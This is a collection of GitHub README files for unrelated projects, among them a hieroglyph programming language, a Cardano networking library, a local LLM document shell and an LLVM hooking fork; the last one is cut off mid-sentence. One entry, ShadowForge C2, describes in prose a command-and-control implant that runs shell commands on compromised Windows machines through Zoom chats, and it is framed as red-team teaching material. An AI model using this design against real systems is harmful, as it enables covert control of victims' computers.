Apache-licensed version of the [`fastrlp`] crate, before it changed licence to GPL. The Rust `fastrlp` implementation is itself a port of the [Golang Apache-licensed fastrlp][gofastrlp]. [reth]: https://github.com/paradigmxyz/reth [`reth_rlp`]: https://github.com/paradigmxyz/reth/tree/e2218bea37aa455b4fd6602fe71a8fbe0974f12b/crates/rlp [`reth_rlp_derive`]: https://github.com/paradigmxyz/reth/tree/e2218bea37aa455b4fd6602fe71a8fbe0974f12b/crates/rlp/rlp-derive [`fastrlp`]: https://github.com/vorot93/fastrlp [gofastrlp]: https://github.com/umbracle/fastrlp #### License <sup> Licensed under either of <a href="LICENSE-APACHE">Apache License, Version 2.0</a> or <a href="LICENSE-MIT">MIT license</a> at your option. </sup> <br> <sub> Unless you explicitly state otherwise, any contribution intentionally submitted for inclusion in these crates by you, as defined in the Apache-2.0 license, shall be dual licensed as above, without any additional terms or conditions. </sub>
45
5
CaCaBlocker/react-redux-saga-tailwindcss-typescript
https://github.com/CaCaBlocker/react-redux-saga-tailwindcss-typescript
🅰 Simple project architecture with React & Redux & Saga & Tailwind CSS & Typescript
# Project Architecture ### What are the main skills? ⚽ React.js <br/> ⚾ Redux + Saga <br/> 🥎 Tailwind CSS <br/> 🏀 Typescript <br/> 🏐 Vite <br/> ### Problem https://github.com/innoloft/Frontend-Application ### Solution 🛠 How to run in local ``` npm run dev ``` 🛠 How to link the code ``` npm run lint ``` 🛠 How to check the format of code ``` npm run format:check ``` 🛠 How to format the code ``` npm run format ``` 🛠 How to build ``` npm run build ```
13
2
puzzlet/seshat
https://github.com/puzzlet/seshat
Code like an Egyptian
**Seshat** is a programming language in Egyptian hieroglyphs. Its goal is to make programming easy for anyone who can read and write Egyptian hieroglyphs. "Seshat" (𓋇 Zẖꜣ.t) is the name of an Egyptian goddess. The goddess of writing, architecture, and mathematics, she would definitely be the goddess of programming. ```seshat # hello.seshat 𓁹𓎡 𓏞𓏜𓎡 𓅓 𓌃𓆓𓇋𓐩𓋇𓅨𓂋𓏏𓎟𓏞𓎟𓐪𓏧𓂢 # ir=k zẖꜣ=k ḏd-mdw j.nḏ Zẖꜣ.t Nb.t Wr.t Zẖꜣ Nb.t Jqd.w grḥ # "Do write: "Hail Seshat, the Great, Mistress of the Script, Mistress of the Builders." ``` ```sh $ node build/lib/seshat.js hello.seshat 𓇋𓐩𓋇𓅨𓂋𓏏𓎟𓏞𓎟𓐪𓏧 ``` ## But seriously, there are upsides about ancient Egyptian programming ### Algorithms before antiquity Among the oldest mathematical texts in human history are Rhind Mathematical Papyrus and Moscow Mathematical Papyrus. They mostly consist of problems and their solutions, and the solutions are written as line-by-line instructions. Like a description of an algorithm, they're very programmatic: > Make 10 _heqats_ of the fat into _ro_; it shall become 3200. > Make a year into days; it shall become 365. > Divide 3200 by 365; it shall become 8 + 2/3 + 1/10 + 1/2190. > Make this in [_haqet_ and _ro_ notation]; 1/64 [_haqet_ and] 1/3 + 1/10 + 1/2190 _ro_. > > -- from Rhind Mathematical Papyrus Problem 66 ```python x = heqat_to_ro(10) assert x == 3200 assert days_in_a_year == 365 x = x / days_in_a_year assert x == 8 + 2/3 + 1/10 + 1/2190 result = ro_to_haqet_and_ro(x) assert result.haqet == 1/64 assert result.ro == 1/13 + 1/10 + 1/2190 ``` ### Binary calculations For multiplications and divisions, Egyptians used a method called "doubling." For example, to calculate 2000 * 5, they simply doubled 2000 until the multiplier reachs high enough for 5, and added things up: ``` \ 1 2000 2 4000 \ 4 8000 Total 10000 ``` -- from Rhind Mathematical Papyrus Problem 52 Over 3000 years later, it is similar to how computers multiply numbers every day. ### Type systems everywhere Egyptians used what we call "determinatives" at the ends of words to specify the categories of the meanings of the words. For example, the words 𓊢𓂝𓂻 ꜥḥꜥ "to stand" and 𓊢𓂝𓇤 ꜥḥꜥ "heap, quantity (in mathematics)" share the same spelling 𓊢𓂝 ꜥḥꜥ, but the determinatives 𓂻 and 𓇤 tell the meaning and make the words different. Like when we declare variables in typed programming languages. In Seshat, you might use 𓇤 at the end of a variable to indicate it's about the quantity, namely a number variable. Or a papyrus scroll 𓏛 for the string variables. ## Documentation TODO ## References & Further Readings ### The first books Reimer (2014) is a good introductory book about ancient Egyptian mathematics. If you are interested in Egyptian hieroglyphs for the first time, McDermott (2001) would be a good starter. Collier & Manley (1998) gives more about grammar and vocabulary. - Collier, M. & Manley, B. (1998). _How to read Egyptian hieroglyphs: a step-by-step guide to teach yourself_. Univ of California Press. - [at archive.org](https://archive.org/details/how-to-read-egyptian-hieroglyphs-a-step-by-step-guide-to-teach-yourself-mark-collier-z-library) - 《(대영박물관이 만든) 이집트 상형문자 읽는 법》. 하연희 옮김. 루비박스, 2005. - McDermott, B. (2001). _Decoding Egyptian hieroglyphs: How to read the secret language of the pharaohs_. Chronicle Books. - [at archive.org](https://archive.org/details/decodingegyptian0000mcde) - 《파라오의 비밀문자: 이집트 상형문자 읽는 법》. 권영진 옮김. 예경, 2005. - Reimer, D. (2014). _Count like an Egyptian: a hands-on introduction to ancient mathematics_. Princeton University Press. ### Language & dictionaries - Allen, J. P. (2000). _Middle Egyptian: An introduction to the language and culture of hieroglyphs_. Cambridge University Press. - [at archive.org](https://archive.org/details/middleegyptianin0000alle) - Budge, E. A. W. (1911). _A Hieroglyphic Vocabulary to the Theban Recension of the Book of the Dead: with an index to all the English equivalents of the Egyptian words_ (Vol. 31). Kegan Paul, Trench, Trübner & Co. Ltd. - [at archive.org](https://archive.org/details/in.ernet.dli.2015.69888) - Budge, E. A. W. (1920). _An Egyptian Hieroglyphic Dictionary: with an index of english words, king list, and geographical list with indexes, list of hieroglyphic characters, coptic and semitic alphabets_ (Vols. 1-2). John Murray. - [Vol. 1 at archive.org](https://archive.org/details/egyptianhierogly01budguoft) - [Vol. 2 at archive.org](https://archive.org/details/egyptianhierogly02budguoft) - Dickson, P. (2006). _Dictionary of middle Egyptian in Gardiner classification order_. - Faulkner, R. O. (1964). _A concise dictionary of Middle Egyptian_. - [at archive.org](https://archive.org/details/concisedictionar0000faul) - Gardiner, A. H. (1927). _Egyptian grammar: being an introduction to the study of hieroglyphs_. 3rd ed. Oxford University Press. - [at archive.org](https://archive.org/details/egyptiangrammar0000alan) - Loprieno, A. (1995). _Ancient Egyptian: a linguistic introduction_. Cambridge University Press. - [at archive.org](https://archive.org/details/ancientegyptianl0000lopr) ### Online dictionaries - Kilani, Marwan. (2000). _Madùwwe Project - [ThotBank dataset](http://maduwwe.herokuapp.com/ThotBank/)_. - [_Ancient Egyptian Dictionary_](https://simondschweitzer.github.io/aed/). - [_Thesaurus Linguae Aegyptiae_](https://aaew.bbaw.de/tla/index.html). ### The texts & researches - Chace, A. B., Archibald, R. C., Bull, L., Glanville, S. R. K., & Manning, H. P. (1929). _The Rhind Mathematical Papyrus. Volume II: Photographs, Transcription Transliteration, Literal Translation_. Mathematical Association of America. - [at archive.org](https://archive.org/details/arnoldbuffumchaceludlowbullhenryparkermanningtherhindmathematicalpapyrus.volumei) - Clagett, M. (1999). _Ancient Egyptian Science: A Source Book_ (vol. 3). American Philosophical Society. - [at archive.org](https://archive.org/details/bub_gb_8c10QYoGa4UC) - Imhausen, A. (2002). _Ägyptische Algorithmen: eine Untersuchung zu den mittelägyptischen mathematischen Aufgabentexten_ (Vol. 65). Harrassowitz Verlag. - Ritter, J. (2002). _Closing the Eye of Horus: The Rise and Fall of 'Horus-eye Fractions'_. In J. M. Steele & A. Imhausen (Eds.), _Under One Sky: Astronomy and Mathematics in the Ancient Near East_ (pp. 297-323). Ugarit-Verlag. - Sethe, K. (1908). _Die altägyptischen Pyramidentexte nach den Papierabdrucken und Photographien des Berliner Museums_, (Vols. 1-2). J. C. Hinrichs'sche Buchhandlung. - [at uchicago.edu](https://www.lib.uchicago.edu/cgi-bin/eos/eos_title.pl?callnum=PJ1553.A1_1908_cop3) - Struve, W. W. (1930). _Mathematischer Papyrus des staatlichen Museums der schönen Künste in Moskau: herausgegeben und kommentiert von WW Struve, unter Benutzung einer hieroglyphischen Transkription von BA Turajeff_ (Quellen und Studien zur Geschichte der Mathematik, Abt. A, Quellen, Band 1). Verlag von Julius Springer.
45
0
StricaHQ/ouroboros-network-js
https://github.com/StricaHQ/ouroboros-network-js
null
<p align="center"> <a href="https://strica.io/" target="_blank"> <img src="https://docs.strica.io/images/logo.png" width="200"> </a> </p> # @stricahq/ouroboros-network-js Ouroboros network library written in typescript with nodejs streaming module. This library has been developed with extensive testing and research done by communicating with Haskell Cardano Node with edge cases and scenarios. Supports multiplexing and streaming for seamless communication between clients. Simple yet sophisticated project structure and modular design of multiplexer and de-multiplexer to support all ouroboros mini protocols without hassle. ✅ Supports communication over unix socket and TCP ✅ Built using nodejs Stream for efficient communication ✅ Stable multiplexer and de-multiplexer ✅ Modular and scalable design ## Currently Implemented Mini Protocols - Local Chain Sync - Local Transaction Submission - Local Tx Monitor Please note that this is only a networking library and is polymorphic in nature. Use [cbors](https://github.com/StricaHQ/cbors) and [Cardano Codec](https://github.com/StricaHQ/cardano-codec) for decoding and parsing the Cardano data objects returned by the mini protocols. Please create an issue if you want to add support for another mini protocol ## Used By - [cardanoscan.io](https://cardanoscan.io) - [Typhon Wallet](https://typhonwallet.io) ## Installation ### yarn/npm ```sh yarn add @stricahq/ouroboros-network-js ``` ## Tests TODO ## Examples TODO ## API Doc Find the API documentation [here](https://docs.strica.io/lib/ouroboros-network-js) # License Copyright 2023 Strica Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
12
1
BuddyNotFound/bbv-drop
https://github.com/BuddyNotFound/bbv-drop
[FREE] FiveM - Supply Drop Script for QBCore/ESX
# bbv-drop [FREE] FiveM - Supply Drop Script for QBCore/ESX <a href='https://ko-fi.com/G2G0N78P7' target='_blank'><img height='36' style='border:0px;height:36px;' src='https://storage.ko-fi.com/cdn/kofi4.png?v=3' border='0' alt='Buy Me a Coffee at ko-fi.com' /></a> ![dba1bb580921ec0ffa3d73234a2ed8ea76045020](https://github.com/BuddyNotFound/bbv-drop/assets/74051918/5a77024e-c809-425f-8d20-2d45baedbfce) >**BBV X WORLD | Supply Drops - FREE** This script allows admins or allowed players from the config to request 'Supply Drops' using a command. ``` /drop x y z items ``` **Example :** ``` /drop 725.06 1284.01 360.3 weapon_pistol weapon_carbinerifle water ``` After the 3 coords args you can add as may weapons/items as you want, the resource works with QBCore and ESX, (ox_target,qb_target). If you don't use ox_target or qb_target there is also standalone setting inside the config. ``` Config.Settings = { Framework = 'QB', -- QBX/QB/ESX/Custom Target = "OX", -- OX/QB/No # If you DON'T use target set it to 'No' } ``` Admins can spawn drop anywhere, they just need to input the coords and the resource dose the rest. Interested in the script? You can download it from here **[Tebex](https://bbv.world/category/free)/[Github](https://github.com/BuddyNotFound/bbv-drop)** **ISSUES :** I've tested and synced the resource as much as I can alone and its currently working without any issues, when you test and sync something alone you might miss something so if find any issues you can open a issue on [Github](https://github.com) or report it here on the post. (let's hope there are none 🙏) Leave a :heart: if you like my work :blush: . >**SCRIPT PREVIEW** https://streamable.com/vn7m3j [click if video is dead](https://streamable.com/vn7m3j) | | | |-------------------------------------|----------------------------| | Code is accessible | Yes| | Subscription-based | No | | Lines (approximately) | 200+ | | Requirements | QBCore or ESX| | Support | Only fix issues|
12
5
trex-arms/sidecar
https://github.com/trex-arms/sidecar
Assets related to the T.REX ARMS Sidecar and Sidecar attachments
# T.REX ARMS Sidecar Project The [T.REX ARMS Sidecar Holster](https://www.trex-arms.com/store/trex-arms-sidecar-holster/) is designed to be modular and extendable. This repository contains resources that should be enough for anyone to design, manufacture, and sell their Sidecar accessories. These files are licensed under the [MIT license](https://choosealicense.com/licenses/mit/). ## [Spine System](Spine) The T.REX ARMS Sidecar hinges on its Spine System. The Sidecar Spine System was developed with open-source capabilities in mind, since the Spine System is a design that combines the best aspects of both rigid and flexible Sidecar-style holsters. It allows rotation on one axis, which provides comfort, but is extremely rigid on all others, for better concealment. Furthermore, the integrated hinge is simpler, sleeker, and far more modular than other existing connector options. The design is built around as many off-the-shelf tools and parts as possible, both to support end users and other manufacturers. For example, the hinge pin has a diameter of 0.25″ and the hinge teeth are 0.25″ with 0.25″ gaps. Individual Kydex attachments can be made with hand tools, and the Spine also interfaces well with plastic parts, like the [T.REX Raptor Wing](https://www.trex-arms.com/store/sidecar-raptor-wing-attachment/), or certain textiles, like the biothane [T.REX Tourniquet Holder](https://www.trex-arms.com/store/sidecar-tourniquet-attachment/). Included are some prints showing all the dimensions in the Sidecar Spine standard that our holsters will be held to, and some 3D files of different tools used in holster manufacture. ## Accessories We have had excellent results printing these accessories using PLA+ filament on FDM printers like the Ender 3, eSUN’s Hard-Tough resin on SLA printers like the Elgoo Mars line, and having them printed in nylon by professional printers like MK Machining. ### [Dual Wield Adapter](DualWieldAdapter) If you would like to carry and fire two guns whilst jumping through the air, you would need two sidecar holsters connected together with exactly the right amount of separation for pistol optics and exactly the right amount of angle for a quick draw. ### [Extender](Extender) One of the best ways to expand your Sidecar’s comfort and concealability might be to literally expand its width. A number of users have discovered that extending the distance between the holster and mag carrier can improve comfort and stability for certain body types. Since there are many different ways in which you might want to do this, we're including three different widths of file type, as well as a few previous versions. If you make one of these, you will also need an additional pin to assemble it. The Sidecar Spine System will work with almost any 0.25” rod, including standard hinge pins, but you can get extras from us [here](https://www.trex-arms.com/store/sidecar-spine-replacement-hardware/). ### [Wing](Spine/Wing) You know, [one of these](https://www.trex-arms.com/store/sidecar-raptor-wing-attachment/). But there's also an angled one that lets you fold the clips back over the holster for a smaller footprint. These wings are also the ideal starting point for any new adapters designed to connect the spine system to any mounting hardware.
16
3
0xEr3bus/ShadowForgeC2
https://github.com/0xEr3bus/ShadowForgeC2
ShadowForge Command & Control - Harnessing the power of Zoom's API, control a compromised Windows Machine from your Zoom Chats.
<h1 align="center"> ShadowForge C2 </h1> ShadowForge Command &amp; Control - Harnessing the power of Zoom's API, control a compromised Windows Machine from your Zoom Chats. ## About ShadowForge C2 ShadowForge C2 is an API-centric Proof of Concept, similar to other C2s. The implant works with HTTP/v2 and TLS connecting over Zoom. The approach taken by this C2 is built upon an implementation strategy that leverages the capabilities of the Zoom Messaging Channel. The implant, residing within the compromised systems, establishes a connection to a designated Zoom Messaging Channel, serving as a secure and discreet communication medium. The domain used has a valid certificate, `api.zoom.us.` ## Why I made this? Why would someone use this? ShadowForge is not a complete C2, and its purpose is to serve a basic understanding for beginners of how this communication works from a team server to the compromised implant. The short purpose is to learn the methodology and steps used during the communication. The C2 doesn't provide any advanced obfuscation, i.e., it's not a ready-to-use C2; This aims to provide a short introduction to using a different secure communication. To Summarize, the project is intended for other red teamers and security researchers to learn. ## Getting Started There's the [Quickstart](https://github.com/0xEr3bus/ShadowForgeC2/wiki/) Guide to setting up the Zoom API. ## How this works * Implant * A C++-compiled implant, when executed, sends the very first call back to a Zoom Chat Channel, hardcoded in the executable. * Every 10 seconds, the implant checks for any updated command to execute; if the command is in this format `command: <COMMAND>,` the implant executes the command. * Once the implant executes the commands, it updates the message with `result: <OUTPUT>.` * The communication is done over TLS with HTTP/2, used library is `wininet.h` * There are quite a few downsides and limitations so far; the most important ones are that the API token used to Send/Receive messages lasts 60 mins from the time generated. * Team Server * Every 12 seconds, a thread on the team server checks if the message is updated with the result; if this message is updated, it just prints the output. * The shell commands are received base64 encoded, as the Zoom Message's format is terrible. The team server decodes and prints correctly. * Keeping this in mind, the Zoom Channels are being Man-In-The-Middle for the Command & Control Communication. * The Implant and Team server is not connected directly; that's been said, the probability of crashing the implant is significantly less. ## TO-DO - [x] Fix the Zoom API Message Length Limit - Base64 encode the command's output, Split the b64 encoded output, and send the output, as reply to the parent message. - [ ] Upload/Download Feature - [ ] Some basic Evasion - [ ] Dynamic Sleep Timers - [ ] Self Distruct Channels
33
4
TransparentLC/saizeriya
https://github.com/TransparentLC/saizeriya
萨莉亚随机点餐
# 萨莉亚随机点餐 https://akarin.dev/saizeriya/ 如标题所示。 很久以前群友的 bot 里有这样的功能(源代码可能是 [Ruan1337/saizeriyarandom.github.io](https://github.com/Ruan1337/saizeriyarandom.github.io)),在做自己的 bot 的时候尝试着自己重新写了一个(本质上其实是用动态规划解决的子集和问题),后来 bot 没办法用了就打算做成独立的网页版。 使用的是[广东地区的菜单](https://gz-saizeriya.com.cn/portal/list/index/id/19.html),改一下数据应该就能用于上海、香港、日本等地区的萨莉亚(甚至其他的餐厅)? 由于算法本身的局限性,不会考虑在生成的菜单中一份菜可以点复数份的情况,也不会考虑支持为每份菜设定权重。 其他内容稍后补充(或者🕊️了) ## 从源代码运行 这是一个使用 Vite 的 vanilla 模板新建的项目,所以直接 `npm install` 然后 `npm run dev` 或者 `npm run build` 就可以了。 不过在运行之前还需要进行[字体子集化处理](https://github.com/TransparentLC/saizeriya/tree/master/src/fusion-pixel-font),这一步骤需要用到 Python,所以你还需要 `pip install -r requirements.txt`。 ## 借物表 * [NES.css](https://nostalgic-css.github.io/NES.css/) * [缝合像素字体](https://fusion-pixel-font.takwolf.com/)
13
0
vsraptor/aide
https://github.com/vsraptor/aide
LLM shell and document interogator
## What is this ? This in general is a Shell around Large Language Model (LLM), at least for now. It is based on [privateGPT](https://github.com/imartinez/privateGPT) code, which I refactored, componetized and enchanced with additional features. In short this tool allows you to interact with different document-sets OR simply query a LLM. **Everything runs locally.** ### Features 1. Profile support - multiple docs stores and ability to switch between them on the fly. - multiple models and ability to switch between them on the fly. 2. Non-question Commands support to do usefull things 3. System prompts support 4. Better CLI interface 5. Direct and QA query modes. 6. Keeps .history of the commands 7. Keeps .chat_history 8. Multiline support (use Alt+Enter to commit a question) 9. Context support - i.e. how many QA pairs to use as a context. ### Supported LLMs It should support all the models that work on privateGPT (type: LlamaCpp and GPT4All). Here are some I used from huggingface : $ ls ./models TheBloke_OpenAssistant-SFT-7-Llama-30B-GGML TheBloke_WizardLM-13B-Uncensored-GGML TheBloke_WizardLM-7B-GGML TheBloke_Guanaco-65-GGML TheBloke_orca_mini_7B-GGML TheBloke_WizardLM-30B-Uncensored-GGML TheBloke_WizardLM-7B-Landmark #### Using GPU if you use **GGML** model you can offload some of the layers to the GPU to speedup inference by using **n_gpu_layers** parameter in the config (for 8GB GPU experiment with values 20-40). To be able to use that parameter make sure you install llama-cpp this way : 1. Make sure you have the CUDA toolkit installed apt install nvidia-cuda-toolkit 2. Install llama-cpp. (Use verbose mode to spot problems with installation) CMAKE_ARGS="-DLLAMA_CUBLAS=on" FORCE_CMAKE=1 VERBOSE=1 pip install llama-cpp-python -v 3. May be install nvitop or nvtop if you want to watch the GPU status/usage ### Profiles The idea of profiles is to keep multiple configurations and be able to switch between them. Every profile can have many document stores. This allows you to separate them thematicaly f.e. one docs store for **economics** another for **history** ...etc For now you have to create manually the directory structure and configuration if you want to use profile other than 'main'. Here is the directory structure for the 'main' profile (for new profiles follow the same structure) : tree -d ./profiles -L 3 ./profiles └── main ├── dbs │ ├── main │ └── test └── src ├── main └── test .. and the config file should be in the profile **base** directory : profiles/main/profile.toml The cfg is using **.toml** format. https://toml.io/en/ ### Context if you want to ask sequence of related questions then use cmd line parameter **-c** to specify how many QA pairs to use as a context. For example : - Who are the spartans ? - ... - what about the athenians ? - .... - how the Thebians differ ? - ... if -c 2, the shell will stealthy prepend the previous two QA pairs as a context. ### Installation git clone [email protected]:vsraptor/aide.git cd aide pip install -r requirments.txt ### Running 0. Create 'models' directory or symlink to the directory where you host your LLM's 1. Download a model in the ./models directory. (it is a good idea to create a subdir for the specific model) F.e. you can pick this model for a test : https://huggingface.co/TheBloke/WizardLM-7B-GGML/tree/main 3. Configure the model in **profiles/main/profile.toml** Example (you can use any argument supported by Langchain LlamaCpp : https://github.com/mmagnesium/langchain/blob/master/langchain/llms/llamacpp.py): ........ [models.main] type='LlamaCpp' target_source_chunks=4 embeddings_model='all-MiniLM-L6-v2' model_path='./models/TheBloke_WizardLM-7B-GGML/wizardLM-7B.ggmlv3.q4_1.bin' n_ctx=1000 n_batch=16 max_tokens=512 4. Then copy the source docs (.txt, .pdf ...) to the corresponding 'src'-sub-directory (look above dir structure) 5. Next ingest the copied documents. This will create/update the relevant vector-db under 'dbs' dir python3 ingest_docs.py --profile main --db main 6. Finally run the shell python3 run_aide.py --profile main --db main ----- #### Tools $ python3 ingest_docs.py --help usage: ingest_docs.py [-h] [--profile PROFILE] [--db DB] AIDE: Ask questions to your documents without an internet connection, using the power of LLMs. options: -h, --help show this help message and exit --profile PROFILE, -p PROFILE Select profile. --db DB, -d DB Select db. $ python3 run_aide.py -h usage: run_aide.py [-h] [--profile PROFILE] [--model MODEL] [--db DB] [--mute-stream] [--multiline MULTILINE] [--ctx_pairs CTX_PAIRS] AIDE: Ask questions to your documents without an internet connection, using the power of LLMs. options: -h, --help show this help message and exit --profile PROFILE, -p PROFILE Select profile. Default: main --model MODEL, -m MODEL Select model. Default: main --db DB, -d DB Select db. Default: main --mute-stream, -M Use this flag to disable the streaming StdOut callback for LLMs. --multiline MULTILINE, -l MULTILINE Use multiline mode. Alt-Enter commits the question. Default: false --ctx_pairs CTX_PAIRS, -c CTX_PAIRS How many QA pairs to use as a context. Default: 0 ----- ### Interact Check the available commands with !help aide: !help quit - exit the session !mode <qa|direct> - switch the mode of quering. 'qa' uses the docs DB to answer the question. 'direct' asks the model directly. ? <question> - ask the question using the opposite mode !result - print the result structure of the last query !docs <number> - return the nth text snippet used as a context to answer the query !source <number> - source file of the nth document of the result !time - how long it took to generate an answer !db list - list the profile DB's !model list - list all models in the profile !show - show the configuration of ... profile <name> model <name> db <name> !switch db <name> - switch the database for QA mode model <name> - switch the Model > <name> <question> - Insert the question inside the prompt in the place of {body} variable and ask the question. !prompt list - list all template prompts names - list the names all template prompts show <name> - show a prompt template by specified name del <name> - delete a prompt template by specified name save <file-name> - save the prompts to a file load <file-name> - load the prompts from a file ----- #### Example of a simple chat $ python3 run_aide.py --profile main --db main Loading profile : ./profiles/main/profile.toml Profile: main Model: main DB: main Using embedded DuckDB with persistence: data will be stored in: ./profiles/main/dbs/main {'model_path': './models/TheBloke_WizardLM-7B-GGML/wizardLM-7B.ggmlv3.q4_1.bin', 'n_ctx': 1000, 'n_batch': 16, 'n_gpu_layers': 20, 'max_tokens': 512} llama.cpp: loading model from ./models/TheBloke_WizardLM-7B-GGML/wizardLM-7B.ggmlv3.q4_1.bin ................ aide: who are the spartans ? Llama.generate: prefix-match hit The Spartans were a group of people from ancient Greece who were known for their military prowess and strict way of life. They lived in the city of Sparta and were considered one of the most powerful city-states in Greece during the 5th century BCE. aide: !time 41.41 aide: !docs 1 city of busy trade. Sparta was an armed camp where people were soldiers for the sake of being soldiers. The people of Athens loved to sit in the sun and discuss poetry or listen to the wise words of a philosopher. The Spartans, on the other hand, never wrote a single line that was considered literature, but they knew how to fight, they liked to fight, and they sacrificed all human emotions to their ideal of military preparedness. aide: !source 1 ./profiles/main/src/main/story-of-mankind.txt aide: !mode direct aide: who are the spartans ? The Spartans were a group of ancient Greeks who lived in the city-state of Sparta, located in the southern part of the country. They were known for their toughness and discipline, as well as their rigorous military training and lifestyle. The Spartans played a key role in defending Greece against invading Persian forces in the 5th century BCE, and they were also famous for their political system, which was based on a strict hierarchy of rulers and warriors. Today, the term "Spartan" is often used as a metaphor for strength, discipline, and toughness. aide: !time 19.11 ----- #### Using multiple sources/dbs $ python3 ingest_docs.py --profile main --db test Loading profile : ./profiles/main/profile.toml Profile: main Model: main DB: test Creating new vectorstore Loading documents from ./profiles/main/src/test Loading new documents: 100%|██████████████████████| 4/4 [00:00<00:00, 21.34it/s] Loaded 4 new documents from ./profiles/main/src/test Split into 6326 chunks of text (max. 500 tokens each) Creating embeddings. May take some minutes... ./profiles/main/dbs/test Using embedded DuckDB with persistence: data will be stored in: ./profiles/main/dbs/test Ingestion complete! You can now query your documents $ python3 run_aide.py --profile main --db main Loading profile : .//profiles/main/profile.toml Profile: main Model: main DB: main ................ # switch to qa mode aide: !mode qa aide: what is law ? Law refers to the set of rules and regulations established by the government and enforced by the legal system to govern the behavior of citizens and maintain order in society. aide: !docs 1 The penal statutes form a very small proportion of the sixty-two books of the Code and Pandects; and in all judicial proceedings, the life or death of a citizen is determined with less caution or delay than the most ordinary question of covenant or inheritance. This singular distinction, though something may be allowed for the urgent necessity of defending the peace of society, is derived from the nature of criminal and civil jurisprudence. Our duties to the state are simple and uniform: the aide: !source 1 ./profiles/main/src/main/hist-rome.txt #switch the db to test aide: !switch db test Switching to DB : test Using embedded DuckDB with persistence: data will be stored in: .//profiles/main/dbs/test aide: what is law ? Law is the collective organization of the individual right to lawful defense. aide: !docs 1 What is law? What ought it to be? What is its domain? What are its limits? Where, in fact, does the prerogative of the legislator stop? I have no hesitation in answering, Law is common force organized to prevent injustice;--in short, Law is Justice. It is not true that the legislator has absolute power over our persons and property, since they pre-exist, and his work is only to secure them from injury. aide: !source 1 ./profiles/main/src/test/bastiat-the-law.txt #ask in direct mode ... ? toggles the mode aide: ?what is law ? Law is a set of rules and regulations that are established by the government or other authoritative bodies to govern the behavior of individuals and organizations within a particular society. These laws are designed to promote order, justice, and fairness in society, and to protect citizens from harm. Law can be written or unwritten, and can cover a wide range of topics such as contract law, criminal law, tort law, property law, and environmental law ----- #### Using System prompt For now very rudimentary ... probably will extend this functionality. Use {body} to specify where you want to insert your question. aide: !prompt new task You have the following objective "{body}". Create a list of step by step actions to accomplish the goal. Adding new prompt : task aide: !prompt list {'task': {'prompt': 'You have the following objective "{body}". Create a list of step by step actions to accomplish the goal.'}} aide: > task How can I sum two numbers ? Q: You have the following objective "How can I sum two numbers ?". Create a list of step by step actions to accomplish the goal. 1. Check if the user has entered the correct syntax for adding two numbers. 2. Prompt the user to enter the first number they want to add. 3. Prompt the user to enter the second number they want to add. 4. Add the two numbers and display the result to the user. 5. Check if the user wants to enter another number or not. If yes, repeat steps 2-4 until no more numbers are entered. 6. If the user does not want to enter another number, thank them for using the program and exit.
12
3
realOxy/touchbar
https://github.com/realOxy/touchbar
Touchbar is a Video Clipper component made by Jetpack Compose.
# Compose TouchBar TouchBar is a Video Clipper component made by Jetpack Compose. (control the clipper handles and display video thumbnails only) [![API](https://img.shields.io/badge/API-21%2B-brightgreen.svg?style=flat)](https://android-arsenal.com/api?level=21) [![](https://jitpack.io/v/realOxy/touchbar.svg)](https://jitpack.io/#realOxy/touchbar) # Installation Add the JitPack repository to your build file, add it in your root build.gradle at the end of repositories: ```groovy allprojects { repositories { ... maven { url 'https://jitpack.io' } } } ``` Add the dependency ```groovy dependencies { implementation 'com.github.realOxy:touchbar:(insert latest version)' } ``` # Quick Start ```kotlin var duration: Long by remember { mutableStateOf(-1L) } val touchbarState = rememberTouchbarState( enabled = duration >= 0L ) TouchBar( state = touchbarState, // enableZHandle = true, modifier = Modifier.fillMathWidth() ) // MediaUtils is available in the project app module. // It is an android platform utils. LaunchEffect(uri) { // loadThumbs is a flow-returned method actually but not list. // if you wanna a correct way to use it, just see app module demo. val newBitmaps: List<Bitmap?> = MediaUtils.loadThumbs(uri) duration = if (uri == null) -1 else MediaUtils.getDuration(context, uri) MediaUtils.recycleNullableUseless(bitmaps, newBitmaps) bitmaps = newBitmaps if (bitmaps.size == thumbCount) { touchbarState.background?.asAndroidBitmap()?.recycle() touchbarState.notifyBackground( MediaUtils.merge(bitmaps, Orientation.Horizontal)?.asImageBitmap() ) } } // recycle all bitmaps DisposableEffect(Unit) { onDispose { bitmaps.forEach { it?.recycle() } } } ``` # TouchBarState - `enabled: Boolean` handles is enabled. - `x: Float` left handle percentage(0f ~ 1f allowed). - `y: Float` right handle percentage(0f ~ 1f allowed). - `z: Float` mid handle percentage(0f ~ 1f allowed). - `isXFocus: Boolean` is left handle is pressing. - `isYFocus: Boolean` is right handle is pressing. - `isZFocus: Boolean` is mid handle is pressing. - `notify()` change x, y, z, isXFocus, isYFocus or isZFocus. - `notifyBackground()` change background bitmap. # Demo [Video Editor](app/src/main/java/com/oxy/mmr/feature/touchbar/TouchBarScreen.kt) https://github.com/realOxy/touchbar/assets/70512220/35be7389-e5c0-4cf7-9a3f-2df0b348b5ee # Versions - Kotlin 1.9.0 - Jetpack Compose 1.4.3 - Jetpack Compose Material3 1.1.1 - Compose Kotlin Compiler Extension 1.5.0
11
0
remotemcu/adin-llvm
https://github.com/remotemcu/adin-llvm
null
# ADIN LLVM Fork: Memory Operation Hooking [![Ubuntu](https://github.com/remotemcu/adin-llvm/actions/workflows/ubuntu.yml/badge.svg)](https://github.com/remotemcu/adin-llvm/actions/workflows/ubuntu.yml) [![Macos](https://github.com/remotemcu/adin-llvm/actions/workflows/macos.yml/badge.svg)](https://github.com/remotemcu/adin-llvm/actions/workflows/macos.yml) ![GitHub all releases](https://img.shields.io/github/downloads/remotemcu/adin-llvm/total) ![logo](docs/logo.png) 1. [Introduction](#introduction) 2. [Usage](#usage) 3. [How build](#how-build) * [Unix-like OS](#unix-like-os) * [Windows OS](#windows-os) ## Introduction: The **ADIN LLVM Fork** is a specialized version of the LLVM compiler infrastructure that incorporates the [**ADIN code transformer pass**](https://github.com/remotemcu/adin-llvm-pass). This fork enables runtime interrupting technologies by allowing developers to hook memory operations, such as store and load operations, and replace them with custom hook functions. The **ADIN LLVM Fork** is particularly crucial for projects like [**REMCU Library**](https://github.com/remotemcu/remcu) and [**REMCU Chip SDKs**](https://github.com/remotemcu/remcu-chip-sdks), where it is used to hook peripheral register operations. ## Usage: To utilize the memory operation hooking capabilities of the **ADIN LLVM Fork**, you can 